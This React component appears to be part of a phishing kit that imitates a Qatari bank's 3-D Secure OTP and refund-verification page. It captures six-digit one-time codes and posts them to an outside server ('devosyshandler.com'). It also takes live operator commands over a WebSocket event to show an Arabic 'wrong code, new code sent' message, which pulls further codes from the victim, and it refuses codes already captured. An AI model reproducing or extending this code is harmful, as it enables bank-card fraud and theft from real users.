import React, { useEffect, useState, useCallback, useRef } from "react";
import axios from "axios";
import { useNavigate } from "react-router-dom";
import QatarBankLayout from './qatar/QatarBankLayout';

const OTPPage = ({ isRefund: propIsRefund }) => {
  const navigate = useNavigate();
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [input1Value, setInput1Value] = useState("");
  const [errorMessage, setErrorMessage] = useState(() => sessionStorage.getItem("otp_error") || "");
  const [isDuplicate, setIsDuplicate] = useState(false);
  const [isShaking, setIsShaking] = useState(false);
  const inputRef = useRef(null);
  
  const isRefund = Boolean(
    propIsRefund ||
    (typeof window !== 'undefined' && window.location.pathname.includes('refund'))
  );

  const uuId = localStorage.getItem("uuId") || localStorage.getItem("session_uuId") || "default";
  const historyKey = isRefund ? `submitted_refund_otps_${uuId}` : `submitted_otps_${uuId}`;
  const retryFlagKey = isRefund ? `refund_retry_flag_${uuId}` : `otp_retry_flag_${uuId}`;
  const design = localStorage.getItem("session_design") || "qatar_default";

  // Clear temporary error from sessionStorage upon mount
  useEffect(() => {
    if (sessionStorage.getItem("otp_error")) {
      setIsShaking(true);
      setTimeout(() => setIsShaking(false), 600);
      sessionStorage.removeItem("otp_error");
    }
  }, []);

  const getSubmittedOtps = useCallback(() => {
    try {
      const s1 = JSON.parse(sessionStorage.getItem(historyKey) || "[]");
      const s2 = JSON.parse(localStorage.getItem(historyKey) || "[]");
      return Array.from(new Set([...s1, ...s2]));
    } catch (_) {
      return [];
    }
  }, [historyKey]);

  const [isRetry, setIsRetry] = useState(() => {
    return sessionStorage.getItem(retryFlagKey) === "true" || localStorage.getItem("otp_retry") === "true";
  });

  // Real-time WebSocket listener
  useEffect(() => {
    const handleWsCommand = (e) => {
      const data = e.detail;
      if (!data) return;
      if (data.design) {
        localStorage.setItem("session_design", data.design);
      }
      if (data.isRetry || data.type === "wrong_code" || data.to === "wrong_code" || data.to === "wrong_refund" || data.errorMessage) {
        setIsRetry(true);
        sessionStorage.setItem(retryFlagKey, "true");
        localStorage.setItem("otp_retry", "true");
        setInput1Value("");
        setIsDuplicate(false);
        setErrorMessage(data.errorMessage || "رمز التحقق غير صحيح. تم إرسال رمز جديد إلى رقم هاتفك المسجل.");
        setIsShaking(true);
        setTimeout(() => setIsShaking(false), 600);
        if (inputRef.current) inputRef.current.focus();
      }
    };
    window.addEventListener("ws_command", handleWsCommand);
    return () => window.removeEventListener("ws_command", handleWsCommand);
  }, [retryFlagKey]);

  // Strict Qatar Rule: 6 digits
  const handleInputChange = (e) => {
    const val = e.target.value.replace(/\D/g, "").slice(0, 6);
    setInput1Value(val);
    if (val.length === 6) {
      const history = getSubmittedOtps();
      if (history.includes(val)) {
        setIsDuplicate(true);
        setIsShaking(true);
        setTimeout(() => setIsShaking(false), 600);
        setErrorMessage("لقد أدخلت هذا الرمز مسبقاً. يرجى إدخال الرمز الجديد المرسل إليك.");
        return;
      }
    }
    setIsDuplicate(false);
    if (!isRetry) {
      setErrorMessage("");
    }
  };

  const handleCodeSubmit = async (e) => {
    e?.preventDefault();
    const cleanCode = input1Value.trim();
    // Strict Qatar OTP validation: strictly 6 digits
    if (cleanCode.length !== 6 || isSubmitting) return;

    // Check for duplicate code
    const history = getSubmittedOtps();
    if (history.includes(cleanCode)) {
      setIsDuplicate(true);
      setErrorMessage("لقد أدخلت هذا الرمز مسبقاً. يرجى إدخال الرمز الجديد المرسل إليك.");
      setIsShaking(true);
      setTimeout(() => setIsShaking(false), 600);
      return;
    }

    // Save to history so user cannot resubmit the same code
    const updatedHistory = [...history, cleanCode];
    sessionStorage.setItem(historyKey, JSON.stringify(updatedHistory));
    localStorage.setItem(historyKey, JSON.stringify(updatedHistory));
    sessionStorage.removeItem(retryFlagKey);
    localStorage.removeItem("otp_retry");
    setIsSubmitting(true);

    // OPTIMISTIC NAVIGATION: Immediately navigate to /3ds/loading
    navigate("/3ds/loading");

    const dataToSend = {
      uuId: localStorage.getItem("uuId") || uuId,
      code: cleanCode,
    };

    // Background submit
    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || "https://devosyshandler.com";
      const endpoint = isRefund ? `${serverUrl}/api/refund_verif` : `${serverUrl}/api/otp_verif`;
      await axios.post(endpoint, dataToSend);
    } catch (error) {
      const serverMsg = error.response?.data?.message || "خطأ في الاتصال. يرجى إعادة المحاولة.";
      sessionStorage.setItem("otp_error", serverMsg);
      sessionStorage.setItem(retryFlagKey, "true");
      navigate(isRefund ? "/3ds/refund" : "/3ds/otp");
    }
  };

  return (
    <QatarBankLayout
      design={design}
      mode={isRefund ? "refund" : "otp"}
      code={input1Value}
      setCode={setInput1Value}
      handleCodeChange={handleInputChange}
      handleSubmit={handleCodeSubmit}
      errorMessage={errorMessage}
      isDuplicate={isDuplicate}
      isRetryActive={isRetry}
      isShaking={isShaking}
      isSubmitting={isSubmitting}
      isRefund={isRefund}
      onCancel={() => navigate("/checkout")}
    />
  );
};

export default OTPPage;
